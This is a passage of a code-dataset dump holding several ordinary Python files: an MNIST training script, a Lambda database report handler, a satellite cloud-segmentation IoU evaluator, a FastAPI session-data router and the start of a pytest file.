({:.2f}%)\\n'.format( # noqa\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n return test_loss\n\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n parser.add_argument('--batch-size', type=int, default=128, metavar='N',\n help='input batch size for training (default: 128)')\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N', # noqa\n help='input batch size for testing (default: 1000)')\n parser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.003, metavar='LR',\n help='learning rate (default: 0.003)')\n parser.add_argument('--margin', type=float, default=0.3,\n help='Margin Loss margin (default: 0.3)')\n parser.add_argument('--n_components', type=int, default=9, metavar='C',\n help='number of components (default: 9)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status') # noqa\n parser.add_argument('--save-model', action='store_true', default=False,\n help='For Saving the current Model')\n args = parser.parse_args()\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.RandomAffine(0, \n translate=(0.1, 0.1)),\n transforms.RandomRotation(15, fill=(0,)),\n transforms.ToTensor()\n ])),\n 
batch_size=args.batch_size, shuffle=True, **kwargs)\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor()\n ])),\n batch_size=args.test_batch_size, shuffle=True, **kwargs)\n\n backbone = Backbone()\n model = CBCModel(backbone,\n n_classes=10,\n n_components=args.n_components,\n component_shape=(1, 28, 28)).to(device)\n\n print(model)\n\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=1e-5)\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min',\n patience=3,\n factor=0.9,\n verbose=True)\n\n lossfunction = MarginLoss(margin=args.margin)\n\n print(\"Starting training\")\n for epoch in range(1, args.epochs + 1):\n train(args, model, device, train_loader, optimizer, lossfunction, epoch) # noqa\n test_loss = test(args, model, device, test_loader, lossfunction)\n scheduler.step(test_loss)\n visualize_components(epoch, model, \"./visualization\")\n\n if (args.save_model):\n torch.save(model.state_dict(), \"mnist_cnn.pt\")\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "mnist.py", "file_name": "mnist.py", "file_ext": "py", "file_size_in_byte": 6901, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.nn.Module", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Hardswish", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch_cbc.layers.ConstrainedConv2d", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn.init.zeros_", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn.init.zeros_", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.nn.init.zeros_", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn.init.zeros_", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 112, "usage_type": "attribute"}, {"api_name": 
"torch.manual_seed", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 120, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 120, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 121, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 121, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomAffine", "line_number": 122, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 122, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomRotation", "line_number": 124, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 124, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 125, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 128, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 129, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 129, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 129, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 129, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 130, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 130, "usage_type": "name"}, {"api_name": "torch_cbc.cbc_model.CBCModel", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 142, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 143, "usage_type": "name"}, {"api_name": "torch_cbc.losses.MarginLoss", "line_number": 148, "usage_type": "call"}, {"api_name": "utils.visualize_components", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "552300567", "text": "import pymysql\nimport json\nimport rds_config\n\n#Var for RDS Connection\nrds_dbhost = rds_config.db_host\nrds_dbname = rds_config.db_name\nrds_dbuser = rds_config.db_username\nrds_dbpwd = rds_config.db_password\n\n#Make Connection to RDS Instance\ntercdbcon = pymysql.connect(rds_dbhost, user=rds_dbuser, passwd=rds_dbpwd, db=rds_dbname, connect_timeout=5)\n\n\ndef handler(event,context):\n \n #Establish DB Cursor\n tercdbcr = tercdbcon.cursor()\n\n #Report Dict\n nsStatReport = []\n\n if(event['id'] and event['id'].isdigit() and event['rptdate'] and event['rptdate'].isdigit() and len(event['rptdate']) == 8):\n\n #Var for Stored Procedure Command\n sp_cmd = \"\"\n\n #Var for Parse Report Date\n tmp_rpt_date = str(event['rptdate'])\n\n #Var for Report Date \n sp_rpt_date = tmp_rpt_date[:4] + \"-\" + tmp_rpt_date[4:-2] + \"-\" + tmp_rpt_date[-2:]\n\n #Var for Station Name\n terc_station = \"\"\n\n\n #Var for numeric of 
submitted cid value\n n_stationid = int(event['id'])\n \n if(n_stationid == 1):\n sp_cmd = \"CALL sp_report_ns_station_range_cascade('\"\n terc_station = \"Cascade\" \n \n if(n_stationid == 2):\n sp_cmd = \"CALL sp_report_ns_station_range_dollarpoint('\"\n terc_station = \"Dollar Point\"\n \n if(n_stationid == 3):\n sp_cmd = \"CALL sp_report_ns_station_range_glenbrook('\"\n terc_station = \"Glenbrook\"\n \n if(n_stationid == 4):\n sp_cmd = \"CALL sp_report_ns_station_range_homewood('\"\n terc_station = \"Homewood\"\n \n if(n_stationid == 5):\n sp_cmd = \"CALL sp_report_ns_station_range_meeks('\"\n terc_station = \"Meeks\"\n \n if(n_stationid == 6):\n sp_cmd = \"CALL sp_report_ns_station_range_rubicon('\"\n terc_station = \"Rubicon\"\n \n if(n_stationid == 7):\n sp_cmd = \"CALL sp_report_ns_station_range_sandharbor('\"\n terc_station = \"Sand Harbor\"\n \n if(n_stationid == 8):\n sp_cmd = \"CALL sp_report_ns_station_range_tahoevista('\"\n terc_station = \"Tahoe Vista\"\n \n if(n_stationid == 9):\n sp_cmd = \"CALL sp_report_ns_station_range_tahoecity('\"\n terc_station = \"Tahoe City\"\n\n if(n_stationid == 10):\n sp_cmd = \"CALL sp_report_ns_station_range_camprichardson('\"\n terc_station = \"Camp Richardson\"\n \n if(n_stationid == 11):\n sp_cmd = \"CALL sp_report_ns_station_range_timbercove('\"\n terc_station = \"Timber Cove\"\n\n \n if(len(sp_cmd) > 1):\n \n sp_cmd += sp_rpt_date + \" 00:00:00','\" + sp_rpt_date + \" 23:59:59')\" \n\n #Call SP for Reporting\n tercdbcr.execute(sp_cmd) \n tercdbcon.commit()\n tdb_rslt = tercdbcr.fetchall()\n\n #Build a report entry per fetched row\n for rptEntry in tdb_rslt:\n\n nssData = {'ID':'',\n 'Station_Name':'',\n 'TmStamp':'',\n 'LS_Chlorophyll_Avg':'',\n 'LS_Temp_Avg':'',\n 'LS_Turbidity_Avg':'',\n 'WaveHeight':''}\n\n \n nssData['ID'] = event['id']\n nssData['Station_Name'] = terc_station\n nssData['TmStamp'] = rptEntry[0].strftime('%Y-%m-%d %H:%M:%S')\n nssData['LS_Chlorophyll_Avg'] = str(rptEntry[1])\n nssData['LS_Temp_Avg'] = str(rptEntry[2])\n nssData['LS_Turbidity_Avg'] = str(rptEntry[3])\n nssData['WaveHeight'] = str(rptEntry[4])\n \n #Add to Report\n nsStatReport.append(nssData)\n\n\n\n \n\n\n #Close Out Cursor and Connection\n tercdbcr.close()\n #tercdbcon.close()\n\n\n return nsStatReport\n\n\n", "sub_path": "Python_Lambda/report-get-ns-system-bydate.py", "file_name": "report-get-ns-system-bydate.py", "file_ext": "py", "file_size_in_byte": 3957, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rds_config.db_host", "line_number": 6, "usage_type": "attribute"}, {"api_name": "rds_config.db_name", "line_number": 7, "usage_type": "attribute"}, {"api_name": "rds_config.db_username", "line_number": 8, "usage_type": "attribute"}, {"api_name": "rds_config.db_password", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "132275371", "text": "# https://www.jeremyjordan.me/evaluating-image-segmentation-models/\n\nimport torch\nimport numpy as np\nfrom PIL import Image\nimport os\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--inp_type', type=str, help='tir/vis/fusion')\nparser.add_argument('--cf',type = str, help='1/13')\nparser.add_argument('--model_path',type=str,help='path to model')\nparser.add_argument('--device',type=str,default='cuda',help='cuda/cpu')\nparser.add_argument('--save_result',type=int,default='0',help='1/0')\n\n\n\nargs = parser.parse_args()\n\n# PyTorch 
version\n\nSMOOTH = 1e-6\n\ndef iou_pytorch(outputs: torch.Tensor, labels: torch.Tensor):\n # You can comment out this line if you are passing tensors of equal shape\n # But if you are passing output from UNet or something it will most probably\n # be with the BATCH x 1 x H x W shape\n outputs = outputs.squeeze(1) # BATCH x 1 x H x W => BATCH x H x W\n \n intersection = (outputs & labels).float().sum((1, 2)) # Will be zero if Truth=0 or Prediction=0\n union = (outputs | labels).float().sum((1, 2)) # Will be zero if both are 0\n \n iou = (intersection + SMOOTH) / (union + SMOOTH) # We smooth our division to avoid 0/0\n \n thresholded = torch.clamp(20 * (iou - 0.5), 0, 10).ceil() / 10 # This is equal to comparing with thresholds\n \n return thresholded # Or thresholded.mean() if you are interested in average across the batch\n \n \n# Numpy version\n# Well, it's the same function, so I'm going to omit the comments\n\ndef iou_numpy(outputs: np.array, labels: np.array):\n outputs = outputs.squeeze(1)\n \n intersection = (outputs & labels).sum((1, 2))\n union = (outputs | labels).sum((1, 2))\n \n iou = (intersection + SMOOTH) / (union + SMOOTH)\n \n thresholded = np.ceil(np.clip(20 * (iou - 0.5), 0, 10)) / 10\n \n return thresholded \n\n\ndef iou_npy(target,prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / np.sum(union)\n \n return iou_score\n\ndef precision( target, prediction ):\n intersection = np.logical_and( target,prediction )\n den = prediction\n prec = np.sum( intersection ) / np.sum( den )\n return prec\n \n \ndef recall( target, prediction ):\n intersection = np.logical_and( target, prediction )\n den = target\n recall = np.sum( intersection ) / np.sum( den )\n return recall\n\n\n\nif __name__ == '__main__':\n arg = args.inp_type\n cloud_flag = args.cf\n device = args.device\n \n test_index = [0,4,8,12,16]\n iou, prec, rec = [], [], []\n man_iou,man_p,man_r = [],[],[]\n if arg == 'vis': \n files = os.listdir(\"./INSAT3D_VIS_India\")\n files.sort()\n files = files[8:25]\n test_list = [ files[i] for i in test_index ] \n elif arg == 'tir':\n files = os.listdir(\"./INSAT3D_TIR1_India\")\n files.sort()\n files = files[8:25]\n test_list = [ files[i] for i in test_index ]\n elif arg == 'fusion':\n files1 = os.listdir(\"./INSAT3D_VIS_India\")\n files1.sort()\n files1 = files1[8:25]\n test_list1 = [ files1[i] for i in test_index ]\n\n files2 = os.listdir(\"./INSAT3D_TIR1_India\")\n files2.sort()\n files2 = files2[8:25]\n test_list2 = [ files2[i] for i in test_index ]\n\n test_list = [ (test_list1[i], test_list2[i]) for i in range(5) ]\n\n\n #device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n \n model = torch.load(args.model_path,map_location=device)\n model = model.eval()\n label_list = [f'./../SIH/INSAT_Cloud_Labels/CROPPED_TIFF/CMK_Cropped_{i}.tif' for i in [9,13,17,21,25]]\n \n for ind,img_name in enumerate(test_list):\n if arg != 'fusion':\n if arg == 'vis':\n image = np.array(Image.open(f'./INSAT3D_VIS_India/{img_name}'))[:,:1072] \n elif arg == 'tir':\n image = np.array(Image.open(f'./INSAT3D_TIR1_India/{img_name}'))[:,:1072] \n elif arg == 'fusion':\n\n image1 = np.array(Image.open(f'./INSAT3D_VIS_India/{img_name[0]}'))[:,:1072]\n image1 = image1.astype(np.float)\n\n image2 = np.array(Image.open(f'./INSAT3D_TIR1_India/{img_name[1]}'))[:,:1072]\n image2 = image2.astype(np.float)\n\n image = np.array([image1,image2])\n image = image.astype(np.float)\n #image = 
image.transpose( (1,2,0))\n\n img_tensor = torch.from_numpy(image)\n #print(img_tensor.shape)\n\n if arg == 'fusion':\n img_tensor = img_tensor.view((1,2,984,1072))\n else:\n img_tensor = img_tensor.view((1,1,984,1072))\n\n\n img_tensor = img_tensor.to(device,dtype=torch.float)\n \n with torch.no_grad():\n out = model(img_tensor)\n output = out.cpu().detach().numpy()\n output = np.squeeze(output)\n output = output > 0\n output = output.astype(float)\n \n \n \n label = np.array(Image.open(label_list[ind]))[:,:1072]\n if cloud_flag == '13':\n label = np.logical_or( label ==1, label ==3 )\n elif cloud_flag == '1' :\n label = label == 1\n \n target = label.astype(np.float)\n \n if args.inp_type == 'vis':\n man_lst,man_prec, man_rec = [], [], []\n for thresh in [0,50,100,200]:\n man_op = image > thresh\n man_op = man_op.astype(np.float)\n man_lst.append(iou_npy(target,man_op))\n man_prec.append( precision(target,man_op) )\n man_rec.append( recall(target,man_op) )\n man_iou.append(man_lst)\n man_p.append(man_prec)\n man_r.append(man_rec) \n \n if args.inp_type == 'tir': \n man_lst,man_prec, man_rec = [], [], []\n for thresh in [600,650,700,750,800,850,900]:\n man_op = image < thresh\n man_op = man_op.astype(np.float)\n man_lst.append(iou_npy(target,man_op))\n man_prec.append( precision(target,man_op) )\n man_rec.append( recall(target,man_op) )\n man_iou.append(man_lst)\n man_p.append(man_prec)\n man_r.append(man_rec) \n \n \n if args.save_result:\n save_dir = f'results_{args.model_path[2:]}'\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n save_img = Image.fromarray(output*255)\n save_name = f'{save_dir}/{ind}.tif'\n print(save_name)\n save_img.save(save_name)\n iou.append(iou_npy(target,output))\n prec.append( precision(target,output) )\n rec.append( recall( target,output ) )\n\n \n iou = np.array(iou)\n prec = np.array(prec)\n rec = np.array( rec )\n man_iou =np.array(man_iou)\n man_p = np.array(man_p)\n man_r = np.array(man_r)\n print(np.mean(man_iou,axis=0) )\n print(\"precision \", np.mean(man_p,axis=0))\n print( \" recall \", np.mean(man_r,axis=0) )\n print(iou)\n print(np.mean(iou), np.mean(prec), np.mean(rec))\n\n \n\n\n \n\n\n'''\nlabel = np.array(Image.open(f'./../SIH/INSAT_Cloud_Labels/CROPPED_TIFF/CMK_Cropped_13.tif'))[:,:1072]\nlabel = np.logical_or( label==1, label==3 )\ntarget = label.astype(np.float)\nlabel = label.astype(np.bool)\nlabel = np.reshape(label, (1,label.shape[0],label.shape[1]))\nprint(target)\n\nimg = np.array(Image.open(f'./INSAT3D_VIS_India/3DIMG_07NOV2019_0600_L1C_SGP_vis.tif'))[:,:1072] \n \n \npred = np.array(Image.open('./out_vis_6000.tif'),dtype=np.bool)\npred = np.reshape(pred,(1,pred.shape[0],pred.shape[1])) \nprediction = np.array(Image.open('./out_vis_6000.tif'),dtype=np.float)\nprediction = prediction > 0\nprediction = prediction.astype(float)\nprint(prediction)\n\nprint(img)\n#print(prediction)\n#prediction = np.ones((label.shape[1],label.shape[2]))\n#print(np.sum(prediction-pred))\n\nprint(label.shape,pred.shape)\nprint( iou_npy( target, prediction ) )\n\nfor i in range(0,250,10):\n manual_prediction = img >i\n manual_prediction = manual_prediction.astype(np.float)\n print(i, iou_npy(target,manual_prediction))\nmanual_prediction = img>85\nprint(\"85\", iou_npy(target,manual_prediction))\n\n\n\n#iou, thresholded = iou_numpy(prediction.astype(bool),label)\n\n\nprint(f' iou_score - {iou_score}')\n#print(iou, thresholded)\n'''\n ", "sub_path": "unet/pytorch-unet/calc_iou.py", "file_name": "calc_iou.py", "file_ext": "py", "file_size_in_byte": 8509, 
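Editor's sketch of the smoothing trick used in `iou_pytorch` above: adding SMOOTH to both numerator and denominator keeps an empty prediction/ground-truth pair (union == 0) at IoU close to 1 instead of 0/0, and the clamp/ceil line buckets IoU into COCO-style thresholds. Assumes only torch; the shapes are illustrative.

```python
import torch

SMOOTH = 1e-6
outputs = torch.zeros((1, 4, 4), dtype=torch.bool)  # empty predicted mask
labels = torch.zeros((1, 4, 4), dtype=torch.bool)   # empty ground-truth mask

intersection = (outputs & labels).float().sum((1, 2))  # 0.0
union = (outputs | labels).float().sum((1, 2))          # 0.0
iou = (intersection + SMOOTH) / (union + SMOOTH)        # tensor([1.]) rather than NaN

# Maps IoU < 0.5 to 0 and IoU in [0.5, 1.0] to steps 0.0, 0.1, ..., 1.0,
# i.e. the same result as counting how many thresholds 0.5:0.05:0.95 are passed.
thresholded = torch.clamp(20 * (iou - 0.5), 0, 10).ceil() / 10
```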
"program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.clamp", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.ceil", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.logical_or", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 74, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 88, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 93, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 98, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 120, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 120, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 122, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 122, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 125, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.float", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 128, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 128, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.float", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 132, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 144, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 155, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 155, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 155, "usage_type": "name"}, {"api_name": "numpy.logical_or", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 161, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 167, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 179, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 190, "usage_type": "attribute"}, {"api_name": "os.mkdir", 
"line_number": 191, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 192, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 192, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 211, "usage_type": "call"}]} +{"seq_id": "399349143", "text": "import logging\nfrom typing import List\n\nfrom fastapi import APIRouter, BackgroundTasks, Depends\nfrom fastapi.security import HTTPBasic, HTTPBasicCredentials\nfrom starlette.status import HTTP_200_OK\n\nfrom cme import database, utils, controller\nfrom cme.api import error\n\nrouter = APIRouter()\nsecurity = HTTPBasic()\n\n\n# for group 1 to give information about new protocols\n@router.post(\"/\", status_code=HTTP_200_OK, tags=[])\nasync def post_new_ids(ids: List[str], background_tasks: BackgroundTasks,\n credentials: HTTPBasicCredentials = Depends(security)):\n utils.get_basic_auth_client(credentials)\n\n # create subprocess: background task to get new protocols and iterate over (start parser/cme)\n logging.info(f\"Received update request for sessions '{ids}'\")\n background_tasks.add_task(controller.evaluate_newest_sessions, ids)\n\n return {\"details: \": f\"Background task has been created to evaluate newest sessions with ids: '{ids}'\"}\n\n\n@router.get(\"/session/{session_id}\", status_code=HTTP_200_OK, tags=['data'])\nasync def get_session(session_id: int, credentials: HTTPBasicCredentials = Depends(security)):\n utils.get_basic_auth_client(credentials)\n\n # id = legislative period + session eg: 19177\n session = database.find_one(\"session\", {'session_id': session_id})\n\n if not session:\n error.raise_404(f\"No session with id '{session_id}' was found.\")\n del session['_id']\n return session\n\n\n@router.get(\"/sessions/\", status_code=HTTP_200_OK, tags=['data'])\nasync def get_session_ids(credentials: HTTPBasicCredentials = Depends(security)):\n utils.get_basic_auth_client(credentials)\n\n session_ids = database.find_all_ids('session', 'session_id')\n session_ids.sort()\n return session_ids\n\n\n@router.get(\"/period/{legislative_period}\", status_code=HTTP_200_OK, tags=['data'])\nasync def get_all_sessions_in_legislative_period(legislative_period: int,\n credentials: HTTPBasicCredentials = Depends(security)):\n utils.get_basic_auth_client(credentials)\n\n sessions = database.find_many(\"session\", {'legislative_period': legislative_period})\n if not sessions:\n error.raise_404(f\"No sessions found for legislative period '{legislative_period}'.\")\n\n for session in sessions:\n del session['_id']\n return sessions\n", "sub_path": "cme/api/api_session.py", "file_name": "api_session.py", "file_ext": "py", "file_size_in_byte": 2341, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "fastapi.APIRouter", "line_number": 11, "usage_type": "call"}, {"api_name": "fastapi.security.HTTPBasic", 
"line_number": 12, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "fastapi.BackgroundTasks", "line_number": 17, "usage_type": "name"}, {"api_name": "fastapi.security.HTTPBasicCredentials", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 18, "usage_type": "call"}, {"api_name": "cme.utils.get_basic_auth_client", "line_number": 19, "usage_type": "call"}, {"api_name": "cme.utils", "line_number": 19, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 22, "usage_type": "call"}, {"api_name": "cme.controller.evaluate_newest_sessions", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cme.controller", "line_number": 23, "usage_type": "name"}, {"api_name": "starlette.status.HTTP_200_OK", "line_number": 16, "usage_type": "name"}, {"api_name": "fastapi.security.HTTPBasicCredentials", "line_number": 29, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 29, "usage_type": "call"}, {"api_name": "cme.utils.get_basic_auth_client", "line_number": 30, "usage_type": "call"}, {"api_name": "cme.utils", "line_number": 30, "usage_type": "name"}, {"api_name": "cme.database.find_one", "line_number": 33, "usage_type": "call"}, {"api_name": "cme.database", "line_number": 33, "usage_type": "name"}, {"api_name": "cme.api.error.raise_404", "line_number": 36, "usage_type": "call"}, {"api_name": "cme.api.error", "line_number": 36, "usage_type": "name"}, {"api_name": "starlette.status.HTTP_200_OK", "line_number": 28, "usage_type": "name"}, {"api_name": "fastapi.security.HTTPBasicCredentials", "line_number": 42, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 42, "usage_type": "call"}, {"api_name": "cme.utils.get_basic_auth_client", "line_number": 43, "usage_type": "call"}, {"api_name": "cme.utils", "line_number": 43, "usage_type": "name"}, {"api_name": "cme.database.find_all_ids", "line_number": 45, "usage_type": "call"}, {"api_name": "cme.database", "line_number": 45, "usage_type": "name"}, {"api_name": "starlette.status.HTTP_200_OK", "line_number": 41, "usage_type": "name"}, {"api_name": "fastapi.security.HTTPBasicCredentials", "line_number": 52, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 52, "usage_type": "call"}, {"api_name": "cme.utils.get_basic_auth_client", "line_number": 53, "usage_type": "call"}, {"api_name": "cme.utils", "line_number": 53, "usage_type": "name"}, {"api_name": "cme.database.find_many", "line_number": 55, "usage_type": "call"}, {"api_name": "cme.database", "line_number": 55, "usage_type": "name"}, {"api_name": "cme.api.error.raise_404", "line_number": 57, "usage_type": "call"}, {"api_name": "cme.api.error", "line_number": 57, "usage_type": "name"}, {"api_name": "starlette.status.HTTP_200_OK", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "309667366", "text": "import json\nimport pytest\nfrom packaging import version\n\nfrom app import app\nfrom app.main import dataset_search\nfrom app.scicrunch_requests import create_query_string\n\nfrom known_uberons import UBERONS_DICT\nfrom known_dois import has_doi_changed, warn_doi_changes\n\n\n@pytest.fixture\ndef client():\n # Spin up test flask app\n app.config['TESTING'] = True\n return app.test_client()\n\n\ndef test_scicrunch_keys(client):\n r = client.get('/search/')\n assert r.status_code == 200\n assert 'numberOfHits' in json.loads(r.data).keys()\n\n\ndef check_doi_status(client, dataset_id, doi):\n r = 
